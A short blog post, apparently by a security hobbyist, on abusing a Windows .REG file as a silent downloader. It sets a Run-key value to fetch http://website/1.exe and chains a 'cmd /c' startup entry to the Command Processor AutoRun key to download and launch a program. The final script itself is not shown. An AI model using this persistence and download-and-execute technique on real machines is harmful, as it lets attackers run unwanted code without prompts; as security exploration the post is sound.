Windows Registry Downloader
I was having a discussion with a non-security person and the topic turned to dangerous file extensions. He eventually asked how a single ".REG" file launch would be dangerous. Aside from messing up configurations, lowering the system's or browser's security, and causing havoc in Windows (all of which are good enough reasons), the attacker could also change the browser start page's URL to point to a drive-by download site by altering one of a few registry keys like this one:
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
But what else? I haven't heard of any attacks that could be performed using REG files and a very quick search in Google didn't reveal anything juicy. Probably because when a REG file is launched, the user needs to allow it.
This doesn't make for a good attack. In any case, I wondered if I could add a registry key that could download a file from the Internet and then execute it...a kind of registry downloader. So here's my first attempt at this:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Test=http://website/1.exe
Looks like the file attempts to download via Internet Explorer but gets blocked. If I try to execute a local EXE file, then it runs without any warning.
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Test=file:\\c:/1.exe
That's great and all but I still need to get my EXE file onto the computer to run...and do it from the registry. So what if I run a script from the registry which creates a VBS file that downloads and executes my program?
I try to add that to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key and encounter a couple of roadblocks. For one, there's a size constraint. It seems I can only write out 165 bytes when I use this registry key and my script is at least twice that amount.
After searching the registry for another suitable key, I found one that serves my purpose but requires me to use another key to trigger my script to run. Ah, and more roadblocks. I also need to insert newlines in certain places or else the script won't run. There's also certain characters that I need to escape.
Here's what my final REG file looks like:
The file sets up an expandable string key called "AutoRun" in HKCU\Software\Microsoft\Command Processor with the following:
The startup registry key now becomes the trigger which launches the above key automatically when "cmd" runs at startup. The "/c" switch promptly closes the DOS window but it still flashes on the screen. :(
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Start=cmd /c
In this WinXP POC, the calculator program downloaded from a web server and launched automatically without any prompts upon startup. Yeah it's lame but it was a fun personal challenge.